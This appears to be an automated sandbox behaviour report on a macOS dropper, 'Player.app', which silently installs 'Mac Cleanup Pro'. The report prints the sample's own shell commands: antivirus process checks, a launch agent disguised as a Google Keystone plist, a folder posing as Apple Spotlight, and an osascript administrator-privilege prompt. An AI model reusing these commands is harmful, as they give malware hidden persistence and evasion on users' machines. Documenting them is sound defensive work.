Source: /bin/sh (PID: 790)Shell process: mv /tmp/ddd/Updater.app /Users/henry/Library/com.apple.spotlight.CoreJump to behavior
Source: /bin/sh (PID: 791)Shell process: mv /tmp/com.google.keystone.plist /Users/henry/Library/LaunchAgentsJump to behavior
Source: /bin/sh (PID: 792)Shell process: touch /Users/henry/Library/com.apple.spotlight.Core/daxJump to behavior
Source: /bin/sh (PID: 793)Shell process: launchctl load -w /Users/henry/Library/LaunchAgents/com.google.keystone.plistJump to behavior
Source: /bin/sh (PID: 796)Shell process: hdiutil attach /Users/henry/Downloads/mcp_mcpcnsppi.dmgJump to behavior
Source: /bin/sh (PID: 806)Shell process: cp -R /Volumes/MacCleanupPro/Mac Cleanup Pro.app /ApplicationsJump to behavior
Source: /bin/sh (PID: 808)Shell process: open /Applications/Mac Cleanup Pro.appJump to behavior
Source: /bin/sh (PID: 810)Shell process: open /Applications/Mac Cleanup Pro.appJump to behavior
Source: /bin/sh (PID: 811)Shell process: hdiutil detach /Volumes/MacCleanupProJump to behavior
Source: /bin/sh (PID: 813)Shell process: rm -R /Users/henry/Downloads/mcp_mcpcnsppi.dmgJump to behavior
Queries for attached disk images with shell command 'hdiutil'Show sources
Source: /bin/sh (PID: 751)Hdiutil command executed: hdiutil infoJump to behavior
Writes Mach-O files to untypical directoriesShow sources
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcpJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdaterJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/MacOS/mcpuninstallJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelperJump to dropped file
Changes permissions of written Mach-O filesShow sources
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/MacOS/Updater: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftAppKit.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreImage.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftObjectiveC.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftXPC.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftSafariServices.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCore.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreGraphics.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftMetal.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreData.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDispatch.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftos.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreFoundation.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDarwin.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftQuartzCore.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftIOKit.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /usr/bin/unzip (PID: 776)Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftFoundation.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 806)Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/Autoupdate: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 806)Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/fileop: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 806)Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Sparkle: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 806)Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 806)Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/MacOS/helpermcp: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 806)Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdater: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 806)Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/MacOS/mcpuninstall: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 806)Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelper: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdater: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/MacOS/mcpuninstall: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelper: bits: - usr: rx grp: rx all: rwxJump to dropped file
Creates application bundlesShow sources
Source: /usr/bin/unzip (PID: 776)Bundle Info.plist file created: /tmp/ddd/Updater.app/Contents/Info.plistJump to behavior
Source: /bin/cp (PID: 806)Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plistJump to behavior
Source: /bin/cp (PID: 806)Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Info.plistJump to behavior
Source: /bin/cp (PID: 806)Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Info.plistJump to behavior
Source: /bin/cp (PID: 806)Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/Info.plistJump to behavior
Source: /bin/cp (PID: 806)Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Info.plistJump to behavior
Source: /bin/cp (PID: 806)Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/Info.plistJump to behavior
Creates code signed application bundlesShow sources
Source: /usr/bin/unzip (PID: 776)Bundle code signature resource file created: /tmp/ddd/Updater.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Source: /bin/cp (PID: 806)Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Source: /bin/cp (PID: 806)Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Source: /bin/cp (PID: 806)Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Source: /bin/cp (PID: 806)Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Source: /bin/cp (PID: 806)Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Source: /bin/cp (PID: 806)Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.9K4WCNJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.vRm7qLJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Hidden file created: /Users/henry/Library/Application Support/com.l.r.l.m/com.crashlytics/.dat.nosync02ed.j46nBnJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Hidden file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/analytics/v2/.dat.nosync02ed.deTIpEJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync0329.fxxEQWJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Hidden file created: /Users/henry/Library/Mac Cleanup Pro/.dat.nosync0329.viSV3iJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Hidden file created: /Users/henry/Library/Mac Cleanup Pro/.dat.nosync0329.6gv7XhJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Hidden file created: /Users/henry/Library/Application Support/mcp/.dat.nosync0329.hbaIKoJump to behavior
Creates launch services that start periodicallyShow sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.vRm7qL -> /Users/henry/Library/LaunchAgents/com.google.keystone.plistJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.9K4WCN -> /Users/henry/Library/LaunchAgents/com.google.keystone.plistJump to behavior
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'Show sources
Source: /bin/sh (PID: 778)Osascript command executed: osascript -e do shell script 'mkdir \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/ddd/Updater.app \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo Passed' with administrator privilegesJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c hdiutil info | grep -e image-pathJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i bitdefenderJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i integoJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i kasperskyJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i nortonJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i trend microJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i clamxavJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i esetJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i f-secureJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i avastJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i aviraJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i malwarebytesJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i sophosJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i zapJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i total avJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i bullguardJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i pandaJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i avgJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c pgrep -f -i webrootJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c ioreg -l | grep -e ManufacturerJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c mkdir /tmp/dddJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c unzip -o /tmp/Updater.zip -d /tmp/dddJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c rm -rf /tmp/Updater.zipJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c osascript -e 'do shell script 'mkdir \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/ddd/Updater.app \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo Passed' with administrator privileges'Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c main_dir_name='com.apple.spotlight.Core' app_name='Updater.app' plist_name='com.google.keystone.plist' mkdir $HOME/Library/$main_dir_name mv /tmp/ddd/$app_name $HOME/Library/$main_dir_name mv /tmp/$plist_name $HOME/Library/LaunchAgents touch $HOME/Library/$main_dir_name/dax launchctl load -w $HOME/Library/LaunchAgents/$plist_nameJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c hdiutil attach /Users/henry/Downloads/mcp_mcpcnsppi.dmgJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c cp -R '/Volumes/MacCleanupPro/Mac Cleanup Pro.app' /ApplicationsJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c open '/Applications/Mac Cleanup Pro.app'Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c open '/Applications/Mac Cleanup Pro.app'Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c hdiutil detach '/Volumes/MacCleanupPro'Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Shell command executed: /bin/sh -c rm -R /Users/henry/Downloads/mcp_mcpcnsppi.dmgJump to behavior
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 782)Shell command executed: /bin/sh -c mkdir '/Library/Application Support/com.apple.spotlight.Core' mv /tmp/ddd/Updater.app '/Library/Application Support/com.apple.spotlight.Core' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo PassedJump to behavior
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/sh (PID: 752)Grep executable: /usr/bin/grep -> grep -e image-pathJump to behavior
Source: /bin/sh (PID: 774)Grep executable: /usr/bin/grep -> grep -e ManufacturerJump to behavior
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/sh (PID: 775)Mkdir executable: /bin/mkdir -> mkdir /tmp/dddJump to behavior
Source: /bin/sh (PID: 783)Mkdir executable: /bin/mkdir -> mkdir /Library/Application Support/com.apple.spotlight.CoreJump to behavior
Source: /bin/sh (PID: 789)Mkdir executable: /bin/mkdir -> mkdir /Users/henry/Library/com.apple.spotlight.CoreJump to behavior
Executes the "pgrep" command search for and/or send signals to processesShow sources
Source: /bin/sh (PID: 754)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i bitdefenderJump to behavior
Source: /bin/sh (PID: 755)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i integoJump to behavior
Source: /bin/sh (PID: 756)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i kasperskyJump to behavior
Source: /bin/sh (PID: 757)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i nortonJump to behavior
Source: /bin/sh (PID: 758)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i trend microJump to behavior
Source: /bin/sh (PID: 759)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i clamxavJump to behavior
Source: /bin/sh (PID: 760)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i esetJump to behavior
Source: /bin/sh (PID: 761)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i f-secureJump to behavior
Source: /bin/sh (PID: 762)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i avastJump to behavior
Source: /bin/sh (PID: 763)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i aviraJump to behavior
Source: /bin/sh (PID: 764)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i malwarebytesJump to behavior
Source: /bin/sh (PID: 765)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i sophosJump to behavior
Source: /bin/sh (PID: 766)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i zapJump to behavior
Source: /bin/sh (PID: 767)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i total avJump to behavior
Source: /bin/sh (PID: 768)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i bullguardJump to behavior
Source: /bin/sh (PID: 769)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i pandaJump to behavior
Source: /bin/sh (PID: 770)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i avgJump to behavior
Source: /bin/sh (PID: 771)Pgrep executable: /usr/bin/pgrep -> pgrep -f -i webrootJump to behavior
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/sh (PID: 777)Rm executable: /bin/rm -> rm -rf /tmp/Updater.zipJump to behavior
Source: /bin/sh (PID: 813)Rm executable: /bin/rm -> rm -R /Users/henry/Downloads/mcp_mcpcnsppi.dmgJump to behavior
Executes the "security_authtrampoline" command used to authorize execution with root privileges (GUI prompt)Show sources
Source: /usr/bin/osascript (PID: 782)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 11 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c mkdir '/Library/Application Support/com.apple.spotlight.Core' mv /tmp/ddd/Updater.app '/Library/Application Support/com.apple.spotlight.Core' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo PassedJump to behavior
Executes the "touch" command used to create files or modify time stampsShow sources
Source: /bin/sh (PID: 792)Touch executable: /usr/bin/touch -> touch /Users/henry/Library/com.apple.spotlight.Core/daxJump to behavior
Explicitly loads/starts launch servicesShow sources
Source: /bin/sh (PID: 786)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.google.keystone.plistJump to behavior
Source: /bin/sh (PID: 793)Launch agent/daemon loaded: launchctl load -w /Users/henry/Library/LaunchAgents/com.google.keystone.plistJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Launch agent/daemon loaded: /bin/launchctl load -wF /Users/henry/Library/Application Support/mcp/com.pcv.mcpuninstall.plistJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Launch agent/daemon loaded: /bin/launchctl load -wF /Users/henry/Library/LaunchAgents/com.pcv.hlprmcp.plistJump to behavior
Opens applications that might be created onesShow sources
Source: /bin/sh (PID: 808)Application opened: open /Applications/Mac Cleanup Pro.appJump to behavior
Source: /bin/sh (PID: 810)Application opened: open /Applications/Mac Cleanup Pro.appJump to behavior
Reads launchservices plist filesShow sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/osascript (PID: 778)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper (PID: 799)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/open (PID: 808)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/open (PID: 810)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses AppleScript framework/components containing Apple Script related functionalitiesShow sources
Source: /usr/bin/osascript (PID: 778)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 778)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
Uses AppleScript scripting additions containing additional functionalities for Apple ScriptsShow sources
Source: /usr/bin/osascript (PID: 778)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 778)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Uses Security framework containing interfaces for system-level user authentication and authorizationShow sources
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plist
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/MacOS/UpdaterJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftAppKit.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreImage.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftObjectiveC.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftXPC.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftSafariServices.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 776)File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCore.dylibJump to dropped file
